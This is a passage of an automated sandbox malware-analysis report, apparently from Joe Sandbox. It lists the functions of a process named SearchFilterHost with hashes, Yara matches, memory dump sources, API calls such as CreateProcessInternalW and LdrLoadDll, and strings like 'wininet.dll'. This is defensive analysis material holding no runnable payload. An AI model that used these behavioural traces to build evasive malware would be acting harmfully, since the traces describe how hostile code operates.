                                                                                                  • Opcode Fuzzy Hash: 742fcd8ad42f5ab503ad98db5a645503cdb2131af9447d025e28f20d03ec6cd5
                                                                                                  • Instruction Fuzzy Hash: BB90023220140412D10075995588646041587F0301F95D055A5025565EC76BC9916131
                                                                                                  Function 051B2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 5d445611a0b4ee2e8e0c4a1ed5a1be281c0939a9e64e16a7ef5ceaa3143d7306
                                                                                                  • Instruction ID: 789187ca84f08afc49e93755f53511d7f83be22282cfc5070ea9b5db019a2e36
                                                                                                  • Opcode Fuzzy Hash: 5d445611a0b4ee2e8e0c4a1ed5a1be281c0939a9e64e16a7ef5ceaa3143d7306
                                                                                                  • Instruction Fuzzy Hash: D290026234140452D10071594594B060415C7F1301F95C059E1065564D871FCD526126
                                                                                                  Function 051B2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 4fadc8c38870c8594dae5ada4cbe809a863a5512fd9eb1c80e237ae926f29851
                                                                                                  • Instruction ID: 0c5c333933ece671e0da73934cd1cee1005e33baeb31cd83d2bd846d1d533dfc
                                                                                                  • Opcode Fuzzy Hash: 4fadc8c38870c8594dae5ada4cbe809a863a5512fd9eb1c80e237ae926f29851
                                                                                                  • Instruction Fuzzy Hash: C7900222601400524140716989C49064415ABF1211795C165A0999560D865FC9655665
                                                                                                  Function 051B2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 5e04e387507bebb67647633aa59e45779bf4880308a8e9cfca71f96e69217bbe
                                                                                                  • Instruction ID: 63d0ff69ac187f660899c05520dc32a5443543a966a7ec017cf2c8b8e4c35c5e
                                                                                                  • Opcode Fuzzy Hash: 5e04e387507bebb67647633aa59e45779bf4880308a8e9cfca71f96e69217bbe
                                                                                                  • Instruction Fuzzy Hash: 0B900222211C0052D20075694D94B07041587E0303F95C159A0155564CCA1BC9615521
                                                                                                  Function 051B2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 588fbed16bab80ba13cfa38889e13478ded679fd6e0a732c97ab8a97c919984b
                                                                                                  • Instruction ID: c12390cb7e4da157eb71cadeaededd6bbe6de70f1c4afa47572b8e94ca610911
                                                                                                  • Opcode Fuzzy Hash: 588fbed16bab80ba13cfa38889e13478ded679fd6e0a732c97ab8a97c919984b
                                                                                                  • Instruction Fuzzy Hash: 3790022260140512D10171594584616041A87E0241FD5C066A1025565ECB2BCA92A131
                                                                                                  Function 051B2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 9b86f43b76aff5d75af983b7c33d2842930a941ce77e6ec99852034cb8113562
                                                                                                  • Instruction ID: 4c8cca7252e27a4e2eecf393edda936c7b2b7229f9fb16e1e3ca117b793e9282
                                                                                                  • Opcode Fuzzy Hash: 9b86f43b76aff5d75af983b7c33d2842930a941ce77e6ec99852034cb8113562
                                                                                                  • Instruction Fuzzy Hash: C890026220180413D14075594984607041587E0302F95C055A2065565E8B2FCD516135
                                                                                                  Function 051B2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 8914f0e8432730cd84d3024264786264cdaa479af299b55c4025f11ea7d1c846
                                                                                                  • Instruction ID: dd027d8a1e9b605389057c9a827e53871c341d8cedfae3b32636b7d55b04c8c2
                                                                                                  • Opcode Fuzzy Hash: 8914f0e8432730cd84d3024264786264cdaa479af299b55c4025f11ea7d1c846
                                                                                                  • Instruction Fuzzy Hash: 9290026220240013410571594594616441A87F0201B95C065E10155A0DC62BC9916125
                                                                                                  Function 051B2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 1310d19058ccb9f4e69f69ee0754a3845fa977e447f36b8a482de62a9a8cd41d
                                                                                                  • Instruction ID: 1bf8770910b9a38e8f11ed21b1d902c96a262d8f9d760c4377977ff1a929a6cd
                                                                                                  • Opcode Fuzzy Hash: 1310d19058ccb9f4e69f69ee0754a3845fa977e447f36b8a482de62a9a8cd41d
                                                                                                  • Instruction Fuzzy Hash: 5090023260540812D15071594594746041587E0301F95C055A0025664D875BCB5576A1
                                                                                                  Function 051B2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 0cd4ff84db7f8be54ff4fb483daacf22cb224a3cf241a31f76f657097687959c
                                                                                                  • Instruction ID: c2c4d94fc794a9a721a2455998a42d8a82c031e18b4d0ec7043202d67a1f8164
                                                                                                  • Opcode Fuzzy Hash: 0cd4ff84db7f8be54ff4fb483daacf22cb224a3cf241a31f76f657097687959c
                                                                                                  • Instruction Fuzzy Hash: 6890023220140812D1807159458464A041587E1301FD5C059A0026664DCB1BCB5977A1
                                                                                                  Function 051B2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 81eab33023e6e695c6f552521e2c04bbcf48bab6819493ab1f2d5be3b869e9e1
                                                                                                  • Instruction ID: db330dd607b63b528b2ff530edf059278ffe55ca6f5aab01a664016fe35f32fc
                                                                                                  • Opcode Fuzzy Hash: 81eab33023e6e695c6f552521e2c04bbcf48bab6819493ab1f2d5be3b869e9e1
                                                                                                  • Instruction Fuzzy Hash: B190023220544852D14071594584A46042587E0305F95C055A00656A4D972BCE55B661
                                                                                                  Function 051B2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: f6851f4ac88f4af2767560f8ac26d9718fcdbaca9b68433dd67f699377499acf
                                                                                                  • Instruction ID: 8364115c16619ea2d1661003e1c194d5dbd15a9d3727361b40412e5d0c44c1c6
                                                                                                  • Opcode Fuzzy Hash: f6851f4ac88f4af2767560f8ac26d9718fcdbaca9b68433dd67f699377499acf
                                                                                                  • Instruction Fuzzy Hash: 6F900226211400130105B5590784507045687E5351395C065F1016560CD727C9615121
                                                                                                  Function 051B2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: b19ab3c461b9c99f7edde8b3ab3b785c92b77d6676fb46411e11c31530cbce6c
                                                                                                  • Instruction ID: b51b84774d2bd6fed7f33255909b47d9eabe8f2f0c06fba004203f161771dec9
                                                                                                  • Opcode Fuzzy Hash: b19ab3c461b9c99f7edde8b3ab3b785c92b77d6676fb46411e11c31530cbce6c
                                                                                                  • Instruction Fuzzy Hash: B2900226221400120145B559078450B085597E63513D5C059F14175A0CC727C9655321
                                                                                                  Function 051B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 0896a68049917beaacb61e60703ba29e4b7acfdb780eef3f6a0e0e4f1fae2359
                                                                                                  • Instruction ID: 0e996669cfcae65df5ae798d6d5d6924498c132a68a1dbf0fbad8eecf1ab201e
                                                                                                  • Opcode Fuzzy Hash: 0896a68049917beaacb61e60703ba29e4b7acfdb780eef3f6a0e0e4f1fae2359
                                                                                                  • Instruction Fuzzy Hash: 7290023260550412D10071594694706141587E0201FA5C455A0425578D879BCA5165A2
                                                                                                  Function 051B39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 5e8fb4d1e5c5916e2c4e20a25afa62c1c865936b5235142be9ed64387f444465
                                                                                                  • Instruction ID: 177d5d12b550bc2caeb5dadc1d09671ba82b2e20e8e245953c7cc5306124fffc
                                                                                                  • Opcode Fuzzy Hash: 5e8fb4d1e5c5916e2c4e20a25afa62c1c865936b5235142be9ed64387f444465
                                                                                                  • Instruction Fuzzy Hash: AC90022224545112D150715D45846164415A7F0201F95C065A08155A4D865BC9556221
                                                                                                  Function 03299BB6 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 138COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 168 3299bb6 169 3299bb7 168->169 169->169 170 3299bb9 169->170 171 3299b78-3299b84 170->171 172 3299bbb-3299e90 170->172 174 3299b8a-3299b91 171->174 175 3299b85 call 32b1a80 171->175 173 3299ea1-3299eaa 172->173 176 3299eac-3299eb5 173->176 177 3299ec2-3299ed3 173->177 178 3299bb0-3299bb5 174->178 179 3299b93-3299baf call 32bc8f7 CreateThread 174->179 175->174 180 3299ec0 176->180 181 3299eb7-3299eba 176->181 183 3299ee4-3299ef0 177->183 180->173 181->180 186 3299ef2-3299f05 183->186 187 3299f07 183->187 186->183 188 3299f0e-3299f27 187->188 188->188 190 3299f29-3299f33 188->190 191 3299f44-3299f4d 190->191 192 3299f4f-3299f62 191->192 193 3299f64-3299f6b 191->193 192->191 194 3299f6d-3299f9c 193->194 195 3299f9e-3299fb7 193->195 194->193 195->195 197 3299fb9 195->197 198 3299fc0-3299fc9 197->198 199 3299fcf-3299fd9 198->199 200 329a272-329a27c 198->200 202 3299fea-3299ff6 199->202 201 329a28d-329a296 200->201 203 329a298-329a2a2 201->203 204 329a2a4-329a2ab 201->204 205 3299ff8-329a004 202->205 206 329a014-329a01b 202->206 203->201 208 329a2ad call 32baf30 204->208 209 329a2ec-329a2f6 204->209 210 329a012 205->210 211 329a006-329a00c 205->211 207 329a026-329a02d 206->207 213 329a058-329a062 207->213 214 329a02f-329a056 207->214 222 329a2b2-329a2bc 208->222 215 329a307-329a310 209->215 210->202 211->210 219 329a073-329a07f 213->219 214->207 220 329a312-329a322 215->220 221 329a324-329a32d 215->221 225 329a081-329a093 219->225 226 329a095-329a0a8 219->226 220->215 223 329a2cd-329a2d9 222->223 223->209 227 329a2db-329a2ea 223->227 225->219 229 329a0b9-329a0c3 226->229 227->223 231 329a0d3-329a0e2 229->231 232 329a0c5-329a0d1 229->232 234 329a0e8-329a0ef 231->234 235 329a18e-329a192 231->235 232->229 238 329a0f1-329a107 234->238 239 329a114-329a11b 234->239 236 329a1bb-329a1c5 235->236 237 329a194-329a1b9 235->237 242 329a1d6-329a1e2 236->242 237->235 243 329a109-329a10f 238->243 244 329a112 238->244 240 329a14d-329a157 239->240 241 329a11d-329a14b 239->241 245 329a168-329a171 240->245 241->239 246 329a1f9-329a1fd 242->246 247 329a1e4-329a1f7 242->247 243->244 244->234 250 329a189 245->250 251 329a173-329a17c 245->251 248 329a1ff-329a21c 246->248 249 329a21e-329a228 246->249 247->242 248->246 253 329a239-329a245 249->253 250->200 254 329a17e-329a181 251->254 255 329a187 251->255 256 329a263-329a26d 253->256 257 329a247-329a253 253->257 254->255 255->245 256->198 259 329a261 257->259 260 329a255-329a25b 257->260 259->253 260->259
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (8$0k$I$J$N$O$V|$[D$`$fx${P
                                                                                                  • API String ID: 0-2758441814
                                                                                                  • Opcode ID: 89a73bc24ddb0cccf76578158963c40af07d6fa1de818f6ba867e7dd186c7847
                                                                                                  • Instruction ID: f184f5531e816bd3d4f866f10b50f34a69e892418526ca70477682402f99c967
                                                                                                  • Opcode Fuzzy Hash: 89a73bc24ddb0cccf76578158963c40af07d6fa1de818f6ba867e7dd186c7847
                                                                                                  • Instruction Fuzzy Hash: 6D818EB0D05269CBEB24CF45C998BDEBBB5BB44308F1081D9D5487B281D7BA1A89CF94
                                                                                                  Function 032B3930 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 032B3A0B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                  • Opcode ID: bf38b0a3e16a0e536b869da28dbb8a37be52a20edd91654170277ad0a209da0b
                                                                                                  • Instruction ID: 7aaaf833f7611938dc9f8f3490fb4b5ee01b692660fcdea7c06fd20bdaee70b1
                                                                                                  • Opcode Fuzzy Hash: bf38b0a3e16a0e536b869da28dbb8a37be52a20edd91654170277ad0a209da0b
                                                                                                  • Instruction Fuzzy Hash: 09318EB5A01305BFD714DFA4C880FEBBBB8EB88744F544558E6196B240D7B0B684CBE1
                                                                                                  Function 032AF32A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InitializeUninitialize
                                                                                                  • String ID: @J7<
                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                  • Opcode ID: 84330b08b2e41f8a80fbae7783b7e1abb65d82335471f4ed81a8e7afdbd13ec8
                                                                                                  • Instruction ID: b7dd5b5a130b1596b7cb7cf0f033bad223b9db64793b31e442d6b5a07cafac13
                                                                                                  • Opcode Fuzzy Hash: 84330b08b2e41f8a80fbae7783b7e1abb65d82335471f4ed81a8e7afdbd13ec8
                                                                                                  • Instruction Fuzzy Hash: 4D311EB6A1060AAFDB00DFD8DC809EEB7B9FF88304B148559E505EB314D775EE458BA0
                                                                                                  Function 032AF330 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InitializeUninitialize
                                                                                                  • String ID: @J7<
                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                  • Opcode ID: 58fd8d9c7d0075827cc987af9533c88b75375b09f3e2d2978001d7f1123bde3e
                                                                                                  • Instruction ID: 0168187adeeb5f22bc89034c62461d1f74aac17733faeb9235af79c6c5574fb4
                                                                                                  • Opcode Fuzzy Hash: 58fd8d9c7d0075827cc987af9533c88b75375b09f3e2d2978001d7f1123bde3e
                                                                                                  • Instruction Fuzzy Hash: F83130B6A1060AAFDB00DFD8DC809EFB7B9FF88304B148559E505EB214D775EE458BA0
                                                                                                  Function 032A7F57 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,032A1AF0,032B7E5F,032B551E,032A1AB3), ref: 032A7F93
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2340568224-0
                                                                                                  • Opcode ID: fe227b56f57054b6a7706e3fe107e47f0ff7fb35ab659a258111ccd3293d00f4
                                                                                                  • Instruction ID: 20163520f54af899ff41e9b4471996b29332e8301d58d7bbbe4b34e405bab346
                                                                                                  • Opcode Fuzzy Hash: fe227b56f57054b6a7706e3fe107e47f0ff7fb35ab659a258111ccd3293d00f4
                                                                                                  • Instruction Fuzzy Hash: 5E01F775524208ABEB08DBECDC42FED77ADDB04750F044269F918DB2C0D636B7908699
                                                                                                  Function 032A4330 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 032A43A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0
                                                                                                  • Opcode ID: ba351a46981eeeefc6d2249afc5c28acff991cf894cb65777e902435abb4b041
                                                                                                  • Instruction ID: abf604fec9255e670901bce0cbf9e375a3d9830d0f33c59d546633006bb5cfc9
                                                                                                  • Opcode Fuzzy Hash: ba351a46981eeeefc6d2249afc5c28acff991cf894cb65777e902435abb4b041
                                                                                                  • Instruction Fuzzy Hash: AF015EB9D1020EBBDB10EAE5DC41FDDB3789B44308F1441A5A9089B241F6B1E784CB91
                                                                                                  Function 032B9610 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,032A812E,00000010,?,?,?,00000044,?,00000010,032A812E,?,?,?), ref: 032B9673
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateInternalProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2186235152-0
                                                                                                  • Opcode ID: 84e4f580c2f966e9f9b07fc989e96498ad32f0c506480f3c6e51f6e36c57b017
                                                                                                  • Instruction ID: 336c7b4d0f594cc8bbae8603b6b894ddec28e364f36eb1ac3aaf79f53d56a6db
                                                                                                  • Opcode Fuzzy Hash: 84e4f580c2f966e9f9b07fc989e96498ad32f0c506480f3c6e51f6e36c57b017
